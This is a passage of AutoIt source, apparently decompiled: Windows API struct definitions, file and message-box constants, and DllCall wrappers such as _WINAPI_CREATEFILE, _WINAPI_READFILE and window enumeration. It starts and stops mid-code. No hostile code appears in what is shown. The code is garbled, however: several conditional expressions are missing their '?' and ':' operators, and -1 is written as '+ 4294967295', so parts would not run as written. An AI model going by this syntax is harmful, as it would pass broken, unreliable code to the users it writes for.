MaxMonth;word MaxDOW;word MaxDay;word MaxHour;word MaxMinute;word MaxSecond;" & "word MaxMSeconds" GLOBAL CONST $TAGNMDAYSTATE = $TAGNMHDR & ";" & $TAGSYSTEMTIME & ";int DayState;ptr pDayState" GLOBAL CONST $TAGNMSELCHANGE = $TAGNMHDR & ";struct;word BegYear;word BegMonth;word BegDOW;word BegDay;word BegHour;word BegMinute;word BegSecond;word BegMSeconds;endstruct;" & "struct;word EndYear;word EndMonth;word EndDOW;word EndDay;word EndHour;word EndMinute;word EndSecond;word EndMSeconds;endstruct" GLOBAL CONST $TAGNMOBJECTNOTIFY = $TAGNMHDR & ";int Item;ptr piid;ptr pObject;long Result;dword dwFlags" GLOBAL CONST $TAGNMTCKEYDOWN = "align 1;" & $TAGNMHDR & ";word VKey;uint Flags" GLOBAL CONST $TAGTVITEM = "struct;uint Mask;handle hItem;uint State;uint StateMask;ptr Text;int TextMax;int Image;int SelectedImage;" & "int Children;lparam Param;endstruct" GLOBAL CONST $TAGTVITEMEX = "struct;" & $TAGTVITEM & ";int Integral;uint uStateEx;hwnd hwnd;int iExpandedImage;int iReserved;endstruct" GLOBAL CONST $TAGNMTREEVIEW = $TAGNMHDR & ";uint Action;" & "struct;uint OldMask;handle OldhItem;uint OldState;uint OldStateMask;" & "ptr OldText;int OldTextMax;int OldImage;int OldSelectedImage;int OldChildren;lparam OldParam;endstruct;" & "struct;uint NewMask;handle NewhItem;uint NewState;uint NewStateMask;" & "ptr NewText;int NewTextMax;int NewImage;int NewSelectedImage;int NewChildren;lparam NewParam;endstruct;" & "struct;long PointX;long PointY;endstruct" GLOBAL CONST $TAGNMTVCUSTOMDRAW = "struct;" & $TAGNMHDR & ";dword DrawStage;handle HDC;" & $TAGRECT & ";dword_ptr ItemSpec;uint ItemState;lparam ItemParam;endstruct" & ";dword ClrText;dword ClrTextBk;int Level" GLOBAL CONST $TAGNMTVDISPINFO = $TAGNMHDR & ";" & $TAGTVITEM GLOBAL CONST $TAGNMTVGETINFOTIP = $TAGNMHDR & ";ptr Text;int TextMax;handle hItem;lparam lParam" GLOBAL CONST $TAGNMTVITEMCHANGE = $TAGNMHDR & ";uint Changed;handle hItem;uint StateNew;uint StateOld;lparam lParam;" GLOBAL CONST $TAGTVHITTESTINFO = $TAGPOINT & ";uint Flags;handle Item" GLOBAL CONST $TAGNMTVKEYDOWN = "align 1;" & $TAGNMHDR & ";word VKey;uint Flags" GLOBAL CONST $TAGNMMOUSE = $TAGNMHDR & ";dword_ptr ItemSpec;dword_ptr ItemData;" & $TAGPOINT & ";lparam HitInfo" GLOBAL CONST $TAGTOKEN_PRIVILEGES = "dword Count;align 4;int64 LUID;dword Attributes" GLOBAL CONST $TAGIMAGEINFO = "handle hBitmap;handle hMask;int Unused1;int Unused2;" & $TAGRECT GLOBAL CONST $TAGMENUINFO = "dword Size;INT Mask;dword Style;uint YMax;handle hBack;dword ContextHelpID;ulong_ptr MenuData" GLOBAL CONST $TAGMENUITEMINFO = "uint Size;uint Mask;uint Type;uint State;uint ID;handle SubMenu;handle BmpChecked;handle BmpUnchecked;" & "ulong_ptr ItemData;ptr TypeData;uint CCH;handle BmpItem" GLOBAL CONST $TAGREBARBANDINFO = "uint cbSize;uint fMask;uint fStyle;dword clrFore;dword clrBack;ptr lpText;uint cch;" & "int iImage;hwnd hwndChild;uint cxMinChild;uint cyMinChild;uint cx;handle hbmBack;uint wID;uint cyChild;uint cyMaxChild;" & "uint cyIntegral;uint cxIdeal;lparam lParam;uint cxHeader" & ((@OSVERSION = "WIN_XP" ) "" ";" & $TAGRECT & ";uint uChevronState" ) GLOBAL CONST $TAGNMREBARAUTOBREAK = $TAGNMHDR & ";uint uBand;uint wID;lparam lParam;uint uMsg;uint fStyleCurrent;bool fAutoBreak" GLOBAL CONST $TAGNMRBAUTOSIZE = $TAGNMHDR & ";bool fChanged;" & "struct;long TargetLeft;long TargetTop;long TargetRight;long TargetBottom;endstruct;" & "struct;long ActualLeft;long ActualTop;long ActualRight;long ActualBottom;endstruct" GLOBAL CONST $TAGNMREBAR = $TAGNMHDR & ";dword dwMask;uint uBand;uint fStyle;uint wID;lparam lParam" GLOBAL CONST $TAGNMREBARCHEVRON = $TAGNMHDR & ";uint uBand;uint wID;lparam lParam;" & $TAGRECT & ";lparam lParamNM" GLOBAL CONST $TAGNMREBARCHILDSIZE = $TAGNMHDR & ";uint uBand;uint wID;" & "struct;long CLeft;long CTop;long CRight;long CBottom;endstruct;" & "struct;long BLeft;long BTop;long BRight;long BBottom;endstruct" GLOBAL CONST $TAGCOLORSCHEME = "dword Size;dword BtnHighlight;dword BtnShadow" GLOBAL CONST $TAGNMTOOLBAR = $TAGNMHDR & ";int iItem;" & "struct;int iBitmap;int idCommand;byte fsState;byte fsStyle;dword_ptr dwData;int_ptr iString;endstruct" & ";int cchText;ptr pszText;" & $TAGRECT GLOBAL CONST $TAGNMTBHOTITEM = $TAGNMHDR & ";int idOld;int idNew;dword dwFlags" GLOBAL CONST $TAGTBBUTTON = "int Bitmap;int Command;byte State;byte Style;dword_ptr Param;int_ptr String" GLOBAL CONST $TAGTBBUTTONINFO = "uint Size;dword Mask;int Command;int Image;byte State;byte Style;word CX;dword_ptr Param;ptr Text;int TextMax" GLOBAL CONST $TAGNETRESOURCE = "dword Scope;dword Type;dword DisplayType;dword Usage;ptr LocalName;ptr RemoteName;ptr Comment;ptr Provider" GLOBAL CONST $TAGOVERLAPPED = "ulong_ptr Internal;ulong_ptr InternalHigh;struct;dword Offset;dword OffsetHigh;endstruct;handle hEvent" GLOBAL CONST $TAGOPENFILENAME = "dword StructSize;hwnd hwndOwner;handle hInstance;ptr lpstrFilter;ptr lpstrCustomFilter;" & "dword nMaxCustFilter;dword nFilterIndex;ptr lpstrFile;dword nMaxFile;ptr lpstrFileTitle;dword nMaxFileTitle;" & "ptr lpstrInitialDir;ptr lpstrTitle;dword Flags;word nFileOffset;word nFileExtension;ptr lpstrDefExt;lparam lCustData;" & "ptr lpfnHook;ptr lpTemplateName;ptr pvReserved;dword dwReserved;dword FlagsEx" GLOBAL CONST $TAGBITMAPINFOHEADER = "struct;dword biSize;long biWidth;long biHeight;word biPlanes;word biBitCount;" & "dword biCompression;dword biSizeImage;long biXPelsPerMeter;long biYPelsPerMeter;dword biClrUsed;dword biClrImportant;endstruct" GLOBAL CONST $TAGBITMAPINFO = $TAGBITMAPINFOHEADER & ";dword biRGBQuad[1]" GLOBAL CONST $TAGBLENDFUNCTION = "byte Op;byte Flags;byte Alpha;byte Format" GLOBAL CONST $TAGGUID = "struct;ulong Data1;ushort Data2;ushort Data3;byte Data4[8];endstruct" GLOBAL CONST $TAGWINDOWPLACEMENT = "uint length;uint flags;uint showCmd;long ptMinPosition[2];long ptMaxPosition[2];long rcNormalPosition[4]" GLOBAL CONST $TAGWINDOWPOS = "hwnd hWnd;hwnd InsertAfter;int X;int Y;int CX;int CY;uint Flags" GLOBAL CONST $TAGSCROLLINFO = "uint cbSize;uint fMask;int nMin;int nMax;uint nPage;int nPos;int nTrackPos" GLOBAL CONST $TAGSCROLLBARINFO = "dword cbSize;" & $TAGRECT & ";int dxyLineButton;int xyThumbTop;" & "int xyThumbBottom;int reserved;dword rgstate[6]" GLOBAL CONST $TAGLOGFONT = "struct;long Height;long Width;long Escapement;long Orientation;long Weight;byte Italic;byte Underline;" & "byte Strikeout;byte CharSet;byte OutPrecision;byte ClipPrecision;byte Quality;byte PitchAndFamily;wchar FaceName[32];endstruct" GLOBAL CONST $TAGKBDLLHOOKSTRUCT = "dword vkCode;dword scanCode;dword flags;dword time;ulong_ptr dwExtraInfo" GLOBAL CONST $TAGPROCESS_INFORMATION = "handle hProcess;handle hThread;dword ProcessID;dword ThreadID" GLOBAL CONST $TAGSTARTUPINFO = "dword Size;ptr Reserved1;ptr Desktop;ptr Title;dword X;dword Y;dword XSize;dword YSize;dword XCountChars;" & "dword YCountChars;dword FillAttribute;dword Flags;word ShowWindow;word Reserved2;ptr Reserved3;handle StdInput;" & "handle StdOutput;handle StdError" GLOBAL CONST $TAGSECURITY_ATTRIBUTES = "dword Length;ptr Descriptor;bool InheritHandle" GLOBAL CONST $TAGWIN32_FIND_DATA = "dword dwFileAttributes;dword ftCreationTime[2];dword ftLastAccessTime[2];dword ftLastWriteTime[2];dword nFileSizeHigh;dword nFileSizeLow;dword dwReserved0;dword dwReserved1;wchar cFileName[260];wchar cAlternateFileName[14]" GLOBAL CONST $TAGTEXTMETRIC = "long tmHeight;long tmAscent;long tmDescent;long tmInternalLeading;long tmExternalLeading;" & "long tmAveCharWidth;long tmMaxCharWidth;long tmWeight;long tmOverhang;long tmDigitizedAspectX;long tmDigitizedAspectY;" & "wchar tmFirstChar;wchar tmLastChar;wchar tmDefaultChar;wchar tmBreakChar;byte tmItalic;byte tmUnderlined;byte tmStruckOut;" & "byte tmPitchAndFamily;byte tmCharSet" GLOBAL CONST $COINIT_APARTMENTTHREADED = 2 GLOBAL CONST $COINIT_DISABLE_OLE1DDE = 4 GLOBAL CONST $COINIT_MULTITHREADED = 0 GLOBAL CONST $COINIT_SPEED_OVER_MEMORY = 8 GLOBAL CONST $FC_NOOVERWRITE = 0 GLOBAL CONST $FC_OVERWRITE = 1 GLOBAL CONST $FC_CREATEPATH = 8 GLOBAL CONST $FT_MODIFIED = 0 GLOBAL CONST $FT_CREATED = 1 GLOBAL CONST $FT_ACCESSED = 2 GLOBAL CONST $FT_ARRAY = 0 GLOBAL CONST $FT_STRING = 1 GLOBAL CONST $FSF_CREATEBUTTON = 1 GLOBAL CONST $FSF_NEWDIALOG = 2 GLOBAL CONST $FSF_EDITCONTROL = 4 GLOBAL CONST $FT_NONRECURSIVE = 0 GLOBAL CONST $FT_RECURSIVE = 1 GLOBAL CONST $FO_READ = 0 GLOBAL CONST $FO_APPEND = 1 GLOBAL CONST $FO_OVERWRITE = 2 GLOBAL CONST $FO_CREATEPATH = 8 GLOBAL CONST $FO_BINARY = 16 GLOBAL CONST $FO_UNICODE = 32 GLOBAL CONST $FO_UTF16_LE = 32 GLOBAL CONST $FO_UTF16_BE = 64 GLOBAL CONST $FO_UTF8 = 128 GLOBAL CONST $FO_UTF8_NOBOM = 256 GLOBAL CONST $FO_ANSI = 512 GLOBAL CONST $FO_UTF16_LE_NOBOM = 1024 GLOBAL CONST $FO_UTF16_BE_NOBOM = 2048 GLOBAL CONST $FO_UTF8_FULL = 16384 GLOBAL CONST $FO_FULLFILE_DETECT = 16384 GLOBAL CONST $EOF = + 4294967295 GLOBAL CONST $FD_FILEMUSTEXIST = 1 GLOBAL CONST $FD_PATHMUSTEXIST = 2 GLOBAL CONST $FD_MULTISELECT = 4 GLOBAL CONST $FD_PROMPTCREATENEW = 8 GLOBAL CONST $FD_PROMPTOVERWRITE = 16 GLOBAL CONST $CREATE_NEW = 1 GLOBAL CONST $CREATE_ALWAYS = 2 GLOBAL CONST $OPEN_EXISTING = 3 GLOBAL CONST $OPEN_ALWAYS = 4 GLOBAL CONST $TRUNCATE_EXISTING = 5 GLOBAL CONST $INVALID_SET_FILE_POINTER = + 4294967295 GLOBAL CONST $FILE_BEGIN = 0 GLOBAL CONST $FILE_CURRENT = 1 GLOBAL CONST $FILE_END = 2 GLOBAL CONST $FILE_ATTRIBUTE_READONLY = 1 GLOBAL CONST $FILE_ATTRIBUTE_HIDDEN = 2 GLOBAL CONST $FILE_ATTRIBUTE_SYSTEM = 4 GLOBAL CONST $FILE_ATTRIBUTE_DIRECTORY = 16 GLOBAL CONST $FILE_ATTRIBUTE_ARCHIVE = 32 GLOBAL CONST $FILE_ATTRIBUTE_DEVICE = 64 GLOBAL CONST $FILE_ATTRIBUTE_NORMAL = 128 GLOBAL CONST $FILE_ATTRIBUTE_TEMPORARY = 256 GLOBAL CONST $FILE_ATTRIBUTE_SPARSE_FILE = 512 GLOBAL CONST $FILE_ATTRIBUTE_REPARSE_POINT = 1024 GLOBAL CONST $FILE_ATTRIBUTE_COMPRESSED = 2048 GLOBAL CONST $FILE_ATTRIBUTE_OFFLINE = 4096 GLOBAL CONST $FILE_ATTRIBUTE_NOT_CONTENT_INDEXED = 8192 GLOBAL CONST $FILE_ATTRIBUTE_ENCRYPTED = 16384 GLOBAL CONST $FILE_SHARE_READ = 1 GLOBAL CONST $FILE_SHARE_WRITE = 2 GLOBAL CONST $FILE_SHARE_DELETE = 4 GLOBAL CONST $FILE_SHARE_READWRITE = BITOR ($FILE_SHARE_READ , $FILE_SHARE_WRITE ) GLOBAL CONST $FILE_SHARE_ANY = BITOR ($FILE_SHARE_READ , $FILE_SHARE_WRITE , $FILE_SHARE_DELETE ) GLOBAL CONST $GENERIC_ALL = 268435456 GLOBAL CONST $GENERIC_EXECUTE = 536870912 GLOBAL CONST $GENERIC_WRITE = 1073741824 GLOBAL CONST $GENERIC_READ = 2147483648 GLOBAL CONST $GENERIC_READWRITE = BITOR ($GENERIC_READ , $GENERIC_WRITE ) GLOBAL CONST $FILE_ENCODING_UTF16LE = 32 GLOBAL CONST $FE_ENTIRE_UTF8 = 1 GLOBAL CONST $FE_PARTIALFIRST_UTF8 = 2 GLOBAL CONST $FN_FULLPATH = 0 GLOBAL CONST $FN_RELATIVEPATH = 1 GLOBAL CONST $FV_COMMENTS = "Comments" GLOBAL CONST $FV_COMPANYNAME = "CompanyName" GLOBAL CONST $FV_FILEDESCRIPTION = "FileDescription" GLOBAL CONST $FV_FILEVERSION = "FileVersion" GLOBAL CONST $FV_INTERNALNAME = "InternalName" GLOBAL CONST $FV_LEGALCOPYRIGHT = "LegalCopyright" GLOBAL CONST $FV_LEGALTRADEMARKS = "LegalTrademarks" GLOBAL CONST $FV_ORIGINALFILENAME = "OriginalFilename" GLOBAL CONST $FV_PRODUCTNAME = "ProductName" GLOBAL CONST $FV_PRODUCTVERSION = "ProductVersion" GLOBAL CONST $FV_PRIVATEBUILD = "PrivateBuild" GLOBAL CONST $FV_SPECIALBUILD = "SpecialBuild" GLOBAL CONST $FRTA_NOCOUNT = 0 GLOBAL CONST $FRTA_COUNT = 1 GLOBAL CONST $FRTA_INTARRAYS = 2 GLOBAL CONST $FRTA_ENTIRESPLIT = 4 GLOBAL CONST $FLTA_FILESFOLDERS = 0 GLOBAL CONST $FLTA_FILES = 1 GLOBAL CONST $FLTA_FOLDERS = 2 GLOBAL CONST $FLTAR_FILESFOLDERS = 0 GLOBAL CONST $FLTAR_FILES = 1 GLOBAL CONST $FLTAR_FOLDERS = 2 GLOBAL CONST $FLTAR_NOHIDDEN = 4 GLOBAL CONST $FLTAR_NOSYSTEM = 8 GLOBAL CONST $FLTAR_NOLINK = 16 GLOBAL CONST $FLTAR_NORECUR = 0 GLOBAL CONST $FLTAR_RECUR = 1 GLOBAL CONST $FLTAR_NOSORT = 0 GLOBAL CONST $FLTAR_SORT = 1 GLOBAL CONST $FLTAR_FASTSORT = 2 GLOBAL CONST $FLTAR_NOPATH = 0 GLOBAL CONST $FLTAR_RELPATH = 1 GLOBAL CONST $FLTAR_FULLPATH = 2 GLOBAL CONST $PATH_ORIGINAL = 0 GLOBAL CONST $PATH_DRIVE = 1 GLOBAL CONST $PATH_DIRECTORY = 2 GLOBAL CONST $PATH_FILENAME = 3 GLOBAL CONST $PATH_EXTENSION = 4 GLOBAL CONST $MB_OK = 0 GLOBAL CONST $MB_OKCANCEL = 1 GLOBAL CONST $MB_ABORTRETRYIGNORE = 2 GLOBAL CONST $MB_YESNOCANCEL = 3 GLOBAL CONST $MB_YESNO = 4 GLOBAL CONST $MB_RETRYCANCEL = 5 GLOBAL CONST $MB_CANCELTRYCONTINUE = 6 GLOBAL CONST $MB_HELP = 16384 GLOBAL CONST $MB_ICONSTOP = 16 GLOBAL CONST $MB_ICONERROR = 16 GLOBAL CONST $MB_ICONHAND = 16 GLOBAL CONST $MB_ICONQUESTION = 32 GLOBAL CONST $MB_ICONEXCLAMATION = 48 GLOBAL CONST $MB_ICONWARNING = 48 GLOBAL CONST $MB_ICONINFORMATION = 64 GLOBAL CONST $MB_ICONASTERISK = 64 GLOBAL CONST $MB_USERICON = 128 GLOBAL CONST $MB_DEFBUTTON1 = 0 GLOBAL CONST $MB_DEFBUTTON2 = 256 GLOBAL CONST $MB_DEFBUTTON3 = 512 GLOBAL CONST $MB_DEFBUTTON4 = 768 GLOBAL CONST $MB_APPLMODAL = 0 GLOBAL CONST $MB_SYSTEMMODAL = 4096 GLOBAL CONST $MB_TASKMODAL = 8192 GLOBAL CONST $MB_DEFAULT_DESKTOP_ONLY = 131072 GLOBAL CONST $MB_RIGHT = 524288 GLOBAL CONST $MB_RTLREADING = 1048576 GLOBAL CONST $MB_SETFOREGROUND = 65536 GLOBAL CONST $MB_TOPMOST = 262144 GLOBAL CONST $MB_SERVICE_NOTIFICATION = 2097152 GLOBAL CONST $MB_RIGHTJUSTIFIED = $MB_RIGHT GLOBAL CONST $IDTIMEOUT = + 4294967295 GLOBAL CONST $IDOK = 1 GLOBAL CONST $IDCANCEL = 2 GLOBAL CONST $IDABORT = 3 GLOBAL CONST $IDRETRY = 4 GLOBAL CONST $IDIGNORE = 5 GLOBAL CONST $IDYES = 6 GLOBAL CONST $IDNO = 7 GLOBAL CONST $IDCLOSE = 8 GLOBAL CONST $IDHELP = 9 GLOBAL CONST $IDTRYAGAIN = 10 GLOBAL CONST $IDCONTINUE = 11 #Region Global Variables and Constants GLOBAL $__G_VENUM , $__G_VEXT = 0 GLOBAL $__G_IRGBMODE = 1 GLOBAL CONST $TAGOSVERSIONINFO = "struct;dword OSVersionInfoSize;dword MajorVersion;dword MinorVersion;dword BuildNumber;dword PlatformId;wchar CSDVersion[128];endstruct" GLOBAL CONST $IMAGE_BITMAP = 0 GLOBAL CONST $IMAGE_ICON = 1 GLOBAL CONST $IMAGE_CURSOR = 2 GLOBAL CONST $IMAGE_ENHMETAFILE = 3 GLOBAL CONST $LR_DEFAULTCOLOR = 0 GLOBAL CONST $LR_MONOCHROME = 1 GLOBAL CONST $LR_COLOR = 2 GLOBAL CONST $LR_COPYRETURNORG = 4 GLOBAL CONST $LR_COPYDELETEORG = 8 GLOBAL CONST $LR_LOADFROMFILE = 16 GLOBAL CONST $LR_LOADTRANSPARENT = 32 GLOBAL CONST $LR_DEFAULTSIZE = 64 GLOBAL CONST $LR_VGACOLOR = 128 GLOBAL CONST $LR_LOADMAP3DCOLORS = 4096 GLOBAL CONST $LR_CREATEDIBSECTION = 8192 GLOBAL CONST $LR_COPYFROMRESOURCE = 16384 GLOBAL CONST $LR_SHARED = 32768 GLOBAL CONST $__TAGCURSORINFO = "dword Size;dword Flags;handle hCursor;" & "struct;long X;long Y;endstruct" GLOBAL CONST $__WINVER = __WINVER () #EndRegion Global Variables and Constants #Region Functions list #EndRegion Functions list #Region Public Functions FUNC _WINAPI_CREATEFILE ($SFILENAME , $ICREATION , $IACCESS = 4 , $ISHARE = 0 , $IATTRIBUTES = 0 , $TSECURITY = 0 ) LOCAL $IDA = 0 , $ISM = 0 , $ICD = 0 , $IFA = 0 IF BITAND ($IACCESS , 1 ) <> 0 THEN $IDA = BITOR ($IDA , $GENERIC_EXECUTE ) IF BITAND ($IACCESS , 2 ) <> 0 THEN $IDA = BITOR ($IDA , $GENERIC_READ ) IF BITAND ($IACCESS , 4 ) <> 0 THEN $IDA = BITOR ($IDA , $GENERIC_WRITE ) IF BITAND ($ISHARE , 1 ) <> 0 THEN $ISM = BITOR ($ISM , $FILE_SHARE_DELETE ) IF BITAND ($ISHARE , 2 ) <> 0 THEN $ISM = BITOR ($ISM , $FILE_SHARE_READ ) IF BITAND ($ISHARE , 4 ) <> 0 THEN $ISM = BITOR ($ISM , $FILE_SHARE_WRITE ) SWITCH $ICREATION CASE 0 $ICD = $CREATE_NEW CASE 1 $ICD = $CREATE_ALWAYS CASE 2 $ICD = $OPEN_EXISTING CASE 3 $ICD = $OPEN_ALWAYS CASE 4 $ICD = $TRUNCATE_EXISTING ENDSWITCH IF BITAND ($IATTRIBUTES , 1 ) <> 0 THEN $IFA = BITOR ($IFA , $FILE_ATTRIBUTE_ARCHIVE ) IF BITAND ($IATTRIBUTES , 2 ) <> 0 THEN $IFA = BITOR ($IFA , $FILE_ATTRIBUTE_HIDDEN ) IF BITAND ($IATTRIBUTES , 4 ) <> 0 THEN $IFA = BITOR ($IFA , $FILE_ATTRIBUTE_READONLY ) IF BITAND ($IATTRIBUTES , 8 ) <> 0 THEN $IFA = BITOR ($IFA , $FILE_ATTRIBUTE_SYSTEM ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "handle" , "CreateFileW" , "wstr" , $SFILENAME , "dword" , $IDA , "dword" , $ISM , "struct*" , $TSECURITY , "dword" , $ICD , "dword" , $IFA , "ptr" , 0 ) IF @ERROR OR ($ARESULT [0 ] = PTR (+ 4294967295 ) ) THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_FREELIBRARY ($HMODULE ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "bool" , "FreeLibrary" , "handle" , $HMODULE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETCURSORINFO () LOCAL $TCURSOR = DLLSTRUCTCREATE ($__TAGCURSORINFO ) LOCAL $ICURSOR = DLLSTRUCTGETSIZE ($TCURSOR ) DLLSTRUCTSETDATA ($TCURSOR , "Size" , $ICURSOR ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "GetCursorInfo" , "struct*" , $TCURSOR ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) LOCAL $ACURSOR [5 ] $ACURSOR [0 ] = TRUE $ACURSOR [1 ] = DLLSTRUCTGETDATA ($TCURSOR , "Flags" ) <> 0 $ACURSOR [2 ] = DLLSTRUCTGETDATA ($TCURSOR , "hCursor" ) $ACURSOR [3 ] = DLLSTRUCTGETDATA ($TCURSOR , "X" ) $ACURSOR [4 ] = DLLSTRUCTGETDATA ($TCURSOR , "Y" ) RETURN $ACURSOR ENDFUNC FUNC _WINAPI_GETDLGCTRLID ($HWND ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "int" , "GetDlgCtrlID" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETMODULEHANDLE ($SMODULENAME ) LOCAL $SMODULENAMETYPE = "wstr" IF $SMODULENAME = "" THEN $SMODULENAME = 0 $SMODULENAMETYPE = "ptr" ENDIF LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "handle" , "GetModuleHandleW" , $SMODULENAMETYPE , $SMODULENAME ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETSTRING ($PSTRING , $BUNICODE = TRUE ) LOCAL $ILENGTH = _WINAPI_STRLEN ($PSTRING , $BUNICODE ) IF @ERROR OR NOT $ILENGTH THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , "" ) LOCAL $TSTRING = DLLSTRUCTCREATE (($BUNICODE "wchar" "char" ) & "[" & ($ILENGTH + 1 ) & "]" , $PSTRING ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN SETEXTENDED ($ILENGTH , DLLSTRUCTGETDATA ($TSTRING , 1 ) ) ENDFUNC FUNC _WINAPI_ISWOW64PROCESS ($IPID = 0 ) IF NOT $IPID THEN $IPID = @AUTOITPID LOCAL $HPROCESS = DLLCALL ("kernel32.dll" , "handle" , "OpenProcess" , "dword" , ($__WINVER < 1536 1024 4096 ) , "bool" , 0 , "dword" , $IPID ) IF @ERROR OR NOT $HPROCESS [0 ] THEN RETURN SETERROR (@ERROR + 20 , @EXTENDED , FALSE ) LOCAL $ARET = DLLCALL ("kernel32.dll" , "bool" , "IsWow64Process" , "handle" , $HPROCESS [0 ] , "bool*" , 0 ) IF __CHECKERRORCLOSEHANDLE ($ARET , $HPROCESS [0 ] ) THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [2 ] ENDFUNC FUNC _WINAPI_LOADIMAGE ($HINSTANCE , $SIMAGE , $ITYPE , $IXDESIRED , $IYDESIRED , $ILOAD ) LOCAL $ARESULT , $SIMAGETYPE = "int" IF ISSTRING ($SIMAGE ) THEN $SIMAGETYPE = "wstr" $ARESULT = DLLCALL ("user32.dll" , "handle" , "LoadImageW" , "handle" , $HINSTANCE , $SIMAGETYPE , $SIMAGE , "uint" , $ITYPE , "int" , $IXDESIRED , "int" , $IYDESIRED , "uint" , $ILOAD ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_LOADLIBRARY ($SFILENAME ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "handle" , "LoadLibraryW" , "wstr" , $SFILENAME ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_PATHISDIRECTORY ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "bool" , "PathIsDirectoryW" , "wstr" , $SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_READFILE ($HFILE , $PBUFFER , $ITOREAD , BYREF $IREAD , $TOVERLAPPED = 0 ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "bool" , "ReadFile" , "handle" , $HFILE , "struct*" , $PBUFFER , "dword" , $ITOREAD , "dword*" , 0 , "struct*" , $TOVERLAPPED ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) $IREAD = $ARESULT [4 ] RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_STRLEN ($PSTRING , $BUNICODE = TRUE ) LOCAL $W = "" IF $BUNICODE THEN $W = "W" LOCAL $ARET = DLLCALL ("kernel32.dll" , "int" , "lstrlen" & $W , "struct*" , $PSTRING ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SWITCHCOLOR ($ICOLOR ) IF $ICOLOR = + 4294967295 THEN RETURN $ICOLOR RETURN BITOR (BITAND ($ICOLOR , 65280 ) , BITSHIFT (BITAND ($ICOLOR , 255 ) , + 4294967280 ) , BITSHIFT (BITAND ($ICOLOR , 16711680 ) , 16 ) ) ENDFUNC FUNC _WINAPI_WRITEFILE ($HFILE , $PBUFFER , $ITOWRITE , BYREF $IWRITTEN , $TOVERLAPPED = 0 ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "bool" , "WriteFile" , "handle" , $HFILE , "struct*" , $PBUFFER , "dword" , $ITOWRITE , "dword*" , 0 , "struct*" , $TOVERLAPPED ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) $IWRITTEN = $ARESULT [4 ] RETURN $ARESULT [0 ] ENDFUNC #EndRegion Public Functions #Region Internal Functions FUNC __CHECKERRORARRAYBOUNDS (CONST BYREF $ADATA , BYREF $ISTART , BYREF $IEND , $NDIM = 1 , $IDIM = $UBOUND_DIMENSIONS ) IF NOT ISARRAY ($ADATA ) THEN RETURN SETERROR (1 , 0 , 1 ) IF UBOUND ($ADATA , $IDIM ) <> $NDIM THEN RETURN SETERROR (2 , 0 , 1 ) IF $ISTART < 0 THEN $ISTART = 0 LOCAL $IUBOUND = UBOUND ($ADATA ) + 4294967295 IF $IEND < 1 OR $IEND > $IUBOUND THEN $IEND = $IUBOUND IF $ISTART > $IEND THEN RETURN SETERROR (4 , 0 , 1 ) RETURN 0 ENDFUNC FUNC __CHECKERRORCLOSEHANDLE ($ARET , $HFILE , $BLASTERROR = FALSE , $ICURERR = @ERROR , $ICUREXT = @EXTENDED ) IF NOT $ICURERR AND NOT $ARET [0 ] THEN $ICURERR = 10 LOCAL $ALASTERROR = DLLCALL ("kernel32.dll" , "dword" , "GetLastError" ) DLLCALL ("kernel32.dll" , "bool" , "CloseHandle" , "handle" , $HFILE ) IF $ICURERR THEN DLLCALL ("kernel32.dll" , "none" , "SetLastError" , "dword" , $ALASTERROR [0 ] ) IF $BLASTERROR THEN $ICUREXT = $ALASTERROR [0 ] RETURN SETERROR ($ICURERR , $ICUREXT , $ICURERR ) ENDFUNC FUNC __DLL ($SPATH , $BPIN = FALSE ) LOCAL $ARET = DLLCALL ("kernel32.dll" , "bool" , "GetModuleHandleExW" , "dword" , ($BPIN 1 2 ) , "wstr" , $SPATH , "ptr*" , 0 ) IF NOT $ARET [3 ] THEN LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "handle" , "LoadLibraryW" , "wstr" , $SPATH ) IF NOT $ARESULT [0 ] THEN RETURN 0 ENDIF RETURN 1 ENDFUNC FUNC __ENUMWINDOWSPROC ($HWND , $BVISIBLE ) LOCAL $ARESULT IF $BVISIBLE THEN $ARESULT = DLLCALL ("user32.dll" , "bool" , "IsWindowVisible" , "hwnd" , $HWND ) IF NOT $ARESULT [0 ] THEN RETURN 1 ENDIF ENDIF __INC ($__G_VENUM ) $__G_VENUM [$__G_VENUM [0 ] [0 ] ] [0 ] = $HWND $ARESULT = DLLCALL ("user32.dll" , "int" , "GetClassNameW" , "hwnd" , $HWND , "wstr" , "" , "int" , 4096 ) $__G_VENUM [$__G_VENUM [0 ] [0 ] ] [1 ] = $ARESULT [2 ] RETURN 1 ENDFUNC FUNC __FATALEXIT 